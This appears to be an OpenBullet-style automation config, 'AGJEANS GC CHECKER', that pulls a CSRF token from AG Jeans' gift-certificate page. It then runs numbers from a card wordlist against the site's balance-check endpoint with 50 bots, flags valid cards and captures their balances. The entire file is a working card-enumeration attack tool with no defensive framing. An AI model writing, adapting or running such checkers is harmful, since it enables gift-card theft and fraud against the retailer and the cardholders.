[SETTINGS]
{
  "Name": "AGJEANS GC CHECKER",
  "SuggestedBots": 50,
  "LastModified": "2018-06-30T01:31:38.7587248+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "Cards",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://www.agjeans.com/on/demandware.store/Sites-AGJeans-Site/default/GiftCert-Purchase" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#TOKEN PARSE "<SOURCE>" CSS "[name=csrf_token]" "value" 0 -> VAR "TOKEN" "" "" 
REQUEST GET "https://www.agjeans.com/on/demandware.store/Sites-AGJeans-Site/default/STSCard-CheckBalance?undefined=undefined&card=<USER>&csrf_token=<TOKEN>" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "true" 
  KEYCHAIN Failure OR 
    KEY "false" 
PARSE "<SOURCE>" JSON "amount" Recursive=FALSE -> CAP "HOLDS" "$" "" 
